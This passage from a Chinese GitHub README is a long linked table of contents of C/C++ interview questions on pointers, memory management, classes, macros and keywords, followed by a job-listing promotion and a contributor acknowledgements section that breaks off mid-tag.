下面这个程序执行后会有什么错误或者效果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#889%E4%B8%8B%E9%9D%A2%E8%BF%99%E4%B8%AA%E7%A8%8B%E5%BA%8F%E6%89%A7%E8%A1%8C%E5%90%8E%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E9%94%99%E8%AF%AF%E6%88%96%E8%80%85%E6%95%88%E6%9E%9C) ##### [19.9.9 请找出下面代码中的所以错误](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#890%E8%AF%B7%E6%89%BE%E5%87%BA%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%89%80%E4%BB%A5%E9%94%99%E8%AF%AF) ##### [20.1.1 请问下面程序有什么错误?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#891%E8%AF%B7%E9%97%AE%E4%B8%8B%E9%9D%A2%E7%A8%8B%E5%BA%8F%E6%9C%89%E4%BB%80%E4%B9%88%E9%94%99%E8%AF%AF) ##### [20.1.2 32位,64位系统中,各种常用内置数据类型占用的字节数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#89232%E4%BD%8D64%E4%BD%8D%E7%B3%BB%E7%BB%9F%E4%B8%AD%E5%90%84%E7%A7%8D%E5%B8%B8%E7%94%A8%E5%86%85%E7%BD%AE%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E5%8D%A0%E7%94%A8%E7%9A%84%E5%AD%97%E8%8A%82%E6%95%B0) ##### [20.1.3 悬空指针与野指针区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#893%E6%82%AC%E7%A9%BA%E6%8C%87%E9%92%88%E4%B8%8E%E9%87%8E%E6%8C%87%E9%92%88%E5%8C%BA%E5%88%AB) ##### [20.1.4 vector、map、multimap底层数据结构](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#894vectormapmultimap%E5%BA%95%E5%B1%82%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84) ##### [20.1.5 
C++的内存分区](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#895c%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E5%8C%BA) ##### [20.1.6 结构与联合有和区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#896%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [20.1.7 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#897%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [20.1.8 多态,虚函数,纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#898%E5%A4%9A%E6%80%81%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [20.1.9 delete与 delete []区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#899delete%E4%B8%8E-delete-%E5%8C%BA%E5%88%AB) ##### [20.2.1 new、delete、malloc、free关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#900newdeletemallocfree%E5%85%B3%E7%B3%BB) ##### [20.2.2 链表和数组存储线性表的比较](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#901%E9%93%BE%E8%A1%A8%E5%92%8C%E6%95%B0%E7%BB%84%E5%AD%98%E5%82%A8%E7%BA%BF%E6%80%A7%E8%A1%A8%E7%9A%84%E6%AF%94%E8%BE%83) ##### [20.2.3 C语言中链表的特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#902c%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%93%BE%E8%A1%A8%E7%9A%84%E7%89%B9%E7%82%B9) ##### [20.2.4 C语言中链表定义及结构](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#903c%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%93%BE%E8%A1%A8%E5%AE%9A%E4%B9%89%E5%8F%8A%E7%BB%93%E6%9E%84) ##### [20.2.5 C++中的临时对象](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#904c%E4%B8%AD%E7%9A%84%E4%B8%B4%E6%97%B6%E5%AF%B9%E8%B1%A1) ##### [20.2.6 C++中的析构函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#905c%E4%B8%AD%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0) ##### [20.2.7 C++中对象的构造的顺序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#906c%E4%B8%AD%E5%AF%B9%E8%B1%A1%E7%9A%84%E6%9E%84%E9%80%A0%E7%9A%84%E9%A1%BA%E5%BA%8F) ##### [20.2.8 C++中赋值和初始化的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#907c%E4%B8%AD%E8%B5%8B%E5%80%BC%E5%92%8C%E5%88%9D%E5%A7%8B%E5%8C%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [20.2.9 C++类成员的初始化](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#908c%E7%B1%BB%E6%88%90%E5%91%98%E7%9A%84%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [20.3.1 C++什么时候需要进行深拷贝](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#909c%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E8%BF%9B%E8%A1%8C%E6%B7%B1%E6%8B%B7%E8%B4%9D) ##### [20.3.2 拷贝构造函数的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#910%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.3.3 C++中对象的声明和定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#912c%E4%B8%AD%E5%AF%B9%E8%B1%A1%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89) ##### [20.3.4 C++中带参数的构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#913c%E4%B8%AD%E5%B8%A6%E5%8F%82%E6%95%B0%E7%9A%84%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [20.3.5 
C++中的构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#914c%E4%B8%AD%E7%9A%84%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [20.3.6 C++对象初始化](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#915c%E5%AF%B9%E8%B1%A1%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [20.3.7 C++面向对象的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#917c%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.3.8 C++中类之间的基本关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#918c%E4%B8%AD%E7%B1%BB%E4%B9%8B%E9%97%B4%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%85%B3%E7%B3%BB) ##### [20.3.9 C++中类成员的作用域](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#919c%E4%B8%AD%E7%B1%BB%E6%88%90%E5%91%98%E7%9A%84%E4%BD%9C%E7%94%A8%E5%9F%9F) ##### [20.4.1 C++中类的关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#920c%E4%B8%AD%E7%B1%BB%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97) ##### [20.4.2 C++中类声明和实现的分离](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#921c%E4%B8%AD%E7%B1%BB%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9E%E7%8E%B0%E7%9A%84%E5%88%86%E7%A6%BB) ##### [20.4.3 C++中的命名空间](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#922c%E4%B8%AD%E7%9A%84%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4) ##### [20.4.4 C和C++相互调用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#923c%E5%92%8Cc%E7%9B%B8%E4%BA%92%E8%B0%83%E7%94%A8) ##### [20.4.5 函数重载的定义、条件、注意事项](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#924%E5%87%BD%E6%95%B0%E9%87%8D%E8%BD%BD%E7%9A%84%E5%AE%9A%E4%B9%89%E6%9D%A1%E4%BB%B6%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9) ##### [20.4.6 C++中 inline 内联编译的限制](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#925c%E4%B8%AD-inline-%E5%86%85%E8%81%94%E7%BC%96%E8%AF%91%E7%9A%84%E9%99%90%E5%88%B6) ##### [20.4.7 内联函数的定义和特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#926%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0%E7%9A%84%E5%AE%9A%E4%B9%89%E5%92%8C%E7%89%B9%E7%82%B9) ##### [20.4.8 C++引用的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#927c%E5%BC%95%E7%94%A8%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.4.9 C++引用的本质](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#928c%E5%BC%95%E7%94%A8%E7%9A%84%E6%9C%AC%E8%B4%A8) ##### [20.5.1 C++中特殊的引用--const引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#929c%E4%B8%AD%E7%89%B9%E6%AE%8A%E7%9A%84%E5%BC%95%E7%94%A8--const%E5%BC%95%E7%94%A8) ##### [20.5.2 C 到 C++ 的升级](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#930c-%E5%88%B0-c-%E7%9A%84%E5%8D%87%E7%BA%A7%E8%87%B3%E5%B0%91%E5%88%97%E5%87%BA%E4%B8%89%E7%82%B9) ##### [20.5.3 C和C++语言中的三目运算符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#931c%E5%92%8Cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E4%B8%89%E7%9B%AE%E8%BF%90%E7%AE%97%E7%AC%A6) ##### [20.5.4 宏的局限和妙用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#932%E5%AE%8F%E7%9A%84%E5%B1%80%E9%99%90%E5%92%8C%E5%A6%99%E7%94%A8) ##### [20.5.5 C 语言中的顺序点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#933c-%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E9%A1%BA%E5%BA%8F%E7%82%B9) ##### [20.5.6 
C/C++语言中的函数参数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#934cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0) ##### [20.5.7 声明和定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#935%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89) ##### [20.5.8 C/C++语言中内存操作的交通规则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#936cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%86%85%E5%AD%98%E6%93%8D%E4%BD%9C%E7%9A%84%E4%BA%A4%E9%80%9A%E8%A7%84%E5%88%99) ##### [20.5.9 C/C++语言中常见的内存错误](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#937cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%B8%B8%E8%A7%81%E7%9A%84%E5%86%85%E5%AD%98%E9%94%99%E8%AF%AF) ##### [20.6.1 内存操作的基本原则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#938%E5%86%85%E5%AD%98%E6%93%8D%E4%BD%9C%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%8E%9F%E5%88%99) ##### [20.6.2 C/C++语言中野指针的含义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#939cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E9%87%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%90%AB%E4%B9%89) ##### [20.6.3 C/C++语言中文件布局在内存中的映射](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#940cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%96%87%E4%BB%B6%E5%B8%83%E5%B1%80%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E6%98%A0%E5%B0%84) ##### [20.6.4 C/C++语言中程序与进程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#941cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%A8%8B%E5%BA%8F%E4%B8%8E%E8%BF%9B%E7%A8%8B) ##### [20.6.5 C/C++程序中的静态存储区](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#942cc%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E9%9D%99%E6%80%81%E5%AD%98%E5%82%A8%E5%8C%BA) ##### [20.6.6 C/C++程序中的堆](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#943cc%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E5%A0%86) ##### [20.6.7 C语言中calloc 和 realloc 函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#945c%E8%AF%AD%E8%A8%80%E4%B8%ADcalloc-%E5%92%8C-realloc-%E5%87%BD%E6%95%B0) ##### [20.6.8 malloc和free函数及使用过程需要注意的地方](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#946malloc%E5%92%8Cfree%E5%87%BD%E6%95%B0%E5%8F%8A%E4%BD%BF%E7%94%A8%E8%BF%87%E7%A8%8B%E9%9C%80%E8%A6%81%E6%B3%A8%E6%84%8F%E7%9A%84%E5%9C%B0%E6%96%B9) ##### [20.6.9 C语言中动态内存分配](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#947c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%8A%A8%E6%80%81%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D) ##### [20.7.1 C语言中的指针阅读技巧](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#948c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E6%8C%87%E9%92%88%E9%98%85%E8%AF%BB%E6%8A%80%E5%B7%A7) ##### [20.7.2 C语言中的函数指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#949c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88) ##### [20.7.3 C语言中指向指针的指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#950c%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%8C%87%E5%90%91%E6%8C%87%E9%92%88%E7%9A%84%E6%8C%87%E9%92%88) ##### [20.7.4 C语言中的数组指针和指针数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#951c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E6%95%B0%E7%BB%84%E6%8C%87%E9%92%88%E5%92%8C%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84) ##### [20.7.5 
C语言中字符串相等的比较](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#952c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9B%B8%E7%AD%89%E7%9A%84%E6%AF%94%E8%BE%83) ##### [20.7.6 C语言中的字符串和字符数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#953c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%92%8C%E5%AD%97%E7%AC%A6%E6%95%B0%E7%BB%84) ##### [20.7.7 数组参数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#954%E6%95%B0%E7%BB%84%E5%8F%82%E6%95%B0) ##### [20.7.8 数组的访问方式](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#955%E6%95%B0%E7%BB%84%E7%9A%84%E8%AE%BF%E9%97%AE%E6%96%B9%E5%BC%8F) ##### [20.7.9 数组地址与数组名](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#956%E6%95%B0%E7%BB%84%E5%9C%B0%E5%9D%80%E4%B8%8E%E6%95%B0%E7%BB%84%E5%90%8D) ##### [20.8.1 C++中类封装的基本概念](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#957c%E4%B8%AD%E7%B1%BB%E5%B0%81%E8%A3%85%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5) ##### [20.8.2 C++中的引用基本点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#958c%E4%B8%AD%E7%9A%84%E5%BC%95%E7%94%A8%E5%9F%BA%E6%9C%AC%E7%82%B9) ##### [20.8.3 函数设计原则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#959%E5%87%BD%E6%95%B0%E8%AE%BE%E8%AE%A1%E5%8E%9F%E5%88%99) ##### [20.8.4 C语言中的回调函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#960c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%9B%9E%E8%B0%83%E5%87%BD%E6%95%B0) ##### [20.8.5 C语言中二维数组参数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#961c%E8%AF%AD%E8%A8%80%E4%B8%AD%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84%E5%8F%82%E6%95%B0) ##### [20.8.6 数组的本质](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#962%E6%95%B0%E7%BB%84%E7%9A%84%E6%9C%AC%E8%B4%A8) ##### [20.8.7 数组的含义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#963%E6%95%B0%E7%BB%84%E7%9A%84%E5%90%AB%E4%B9%89) ##### [20.8.8 C语言中#pragma 的使用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#964c%E8%AF%AD%E8%A8%80%E4%B8%ADpragma-%E7%9A%84%E4%BD%BF%E7%94%A8) ##### [20.8.9 C语言中#line的用法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#965c%E8%AF%AD%E8%A8%80%E4%B8%ADline%E7%9A%84%E7%94%A8%E6%B3%95) ##### [20.9.1 C语言中#error的用法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#966c%E8%AF%AD%E8%A8%80%E4%B8%ADerror%E7%9A%84%E7%94%A8%E6%B3%95) ##### [20.9.2 c语言中数组参数退化为指针的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#967c%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%95%B0%E7%BB%84%E5%8F%82%E6%95%B0%E9%80%80%E5%8C%96%E4%B8%BA%E6%8C%87%E9%92%88%E7%9A%84%E6%84%8F%E4%B9%89) ##### [20.9.3 程序中的顺序点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#968%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E9%A1%BA%E5%BA%8F%E7%82%B9) ##### [20.9.4 面向过程的程序设计](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#969%E9%9D%A2%E5%90%91%E8%BF%87%E7%A8%8B%E7%9A%84%E7%A8%8B%E5%BA%8F%E8%AE%BE%E8%AE%A1) ##### [20.9.5 C语言中的函数类型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#970c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E7%B1%BB%E5%9E%8B) ##### [20.9.6 
C语言二维数组与二级指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#971c%E8%AF%AD%E8%A8%80%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84%E4%B8%8E%E4%BA%8C%E7%BA%A7%E6%8C%87%E9%92%88) ##### [20.9.7 C语言中字符串的长度](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#972c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E9%95%BF%E5%BA%A6) ##### [20.9.8 指针的运算](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#973%E6%8C%87%E9%92%88%E7%9A%84%E8%BF%90%E7%AE%97) ##### [20.9.9 数组名的知识点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#974%E6%95%B0%E7%BB%84%E5%90%8D%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9) ##### [21.1.1 C语言中的条件编译](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#975c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E6%9D%A1%E4%BB%B6%E7%BC%96%E8%AF%91) ##### [21.1.2 C语言中函数和宏定义的对比](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#976c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%87%BD%E6%95%B0%E5%92%8C%E5%AE%8F%E5%AE%9A%E4%B9%89%E7%9A%84%E5%AF%B9%E6%AF%94) ##### [21.1.3 c语言中动态库和静态库的使用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#977c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%8A%A8%E6%80%81%E5%BA%93%E5%92%8C%E9%9D%99%E6%80%81%E5%BA%93%E7%9A%84%E4%BD%BF%E7%94%A8) ##### [21.1.4 c语言中的逗号表达式](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#978c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E9%80%97%E5%8F%B7%E8%A1%A8%E8%BE%BE%E5%BC%8F) ##### [21.1.5 C语言中的单引号和双引号](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#979c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%8D%95%E5%BC%95%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7) ##### [21.1.6 C语言中接续符和转义符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#980c%E8%AF%AD%E8%A8%80%E4%B8%AD%E6%8E%A5%E7%BB%AD%E7%AC%A6%E5%92%8C%E8%BD%AC%E4%B9%89%E7%AC%A6) ##### [21.1.7 C语言中union关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#981c%E8%AF%AD%E8%A8%80%E4%B8%ADunion%E5%85%B3%E9%94%AE%E5%AD%97) ##### [21.1.8 C语言中变量的属性关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#982c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%8F%98%E9%87%8F%E7%9A%84%E5%B1%9E%E6%80%A7%E5%85%B3%E9%94%AE%E5%AD%97) ##### [21.1.9 c语言中enum关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#983c%E8%AF%AD%E8%A8%80%E4%B8%ADenum%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.1 C语言中sizeof关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#984c%E8%AF%AD%E8%A8%80%E4%B8%ADsizeof%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.2 c语言中extern关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#985c%E8%AF%AD%E8%A8%80%E4%B8%ADextern%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.3 C语言中volatile关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#986c%E8%AF%AD%E8%A8%80%E4%B8%ADvolatile%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.4 C语言中const关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#987c%E8%AF%AD%E8%A8%80%E4%B8%ADconst%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [21.2.5 ‘#’与‘##’的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#988%E4%B8%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [21.2.6 
如何引用一个已经定义过的全局变量?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#989%E5%A6%82%E4%BD%95%E5%BC%95%E7%94%A8%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%AE%9A%E4%B9%89%E8%BF%87%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F) ##### [21.2.7 大小端问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#990%E5%A4%A7%E5%B0%8F%E7%AB%AF%E9%97%AE%E9%A2%98) ##### [21.2.8 typedef关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#991typedef%E5%85%B3%E9%94%AE%E5%AD%97) ##### [21.2.9 什么是封装?C++中是如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#992%E4%BB%80%E4%B9%88%E6%98%AF%E5%B0%81%E8%A3%85c%E4%B8%AD%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [21.3.1 C与C++各自是如何定义常量的?有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#993c%E4%B8%8Ec%E5%90%84%E8%87%AA%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E5%B8%B8%E9%87%8F%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [21.3.2 内存的分配方式的分配方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#994%E5%86%85%E5%AD%98%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [21.3.3 头文件中的 ifndef/define/endif 干什么用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#995%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84-ifndefdefineendif-%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8) ##### [21.3.4 什么是预编译?何时需要预编译?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#996%E4%BB%80%E4%B9%88%E6%98%AF%E9%A2%84%E7%BC%96%E8%AF%91%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E9%A2%84%E7%BC%96%E8%AF%91) ##### [21.3.5 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#997%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc%E5%A3%B0%E6%98%8E) ##### [21.3.6 memset ,memcpy 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#998memset-memcpy-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [21.3.7 一下三种指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#999%E4%B8%80%E4%B8%8B%E4%B8%89%E7%A7%8D%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [21.3.8 “常量指针”和“指针常量”有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#1000%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E5%92%8C%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) <br/> <br/> <h3 >零领工作</h3> --- ##### 实时提供,每周发布北京,上海,广州,深圳,杭州,南京,合肥,武汉,长沙,重庆,成都,西安,厦门的c/c++,golang方向的招聘岗位信息。 校招,社招,实习岗位都有的。 面经,八股,简历都有的 <img src="https://img.0voice.com/public/0e59910091576beaebe20f303357edf7.jpg" alt="零领工作" style="width:300px;height:300px;"> <br/> <br/> ## 鸣谢 ##### 感谢各位贡献patch的朋友, 还很多在issue里面出谋划策的朋友,为此衷心感谢。使得该repo能够在github趋势榜,持续一周时间问鼎排行榜。 <a href="https://github.com/zhiyong0804"> <img src="https://avatars2.githubusercontent.com/u/15864088?s=400&v=4" width="40px"> </a> <a href="https://github.com/wangbojing"> <img src="https://avatars2.githubusercontent.com/u/18027560?s=400&v=4" width="40px"> </a> <a href="https://github.com/pyinx"> <img src="https://avatars1.githubusercontent.com/u/3828540?s=400&v=4" width="40px"> </a> <a href="https://github.com/ileler"> <img 
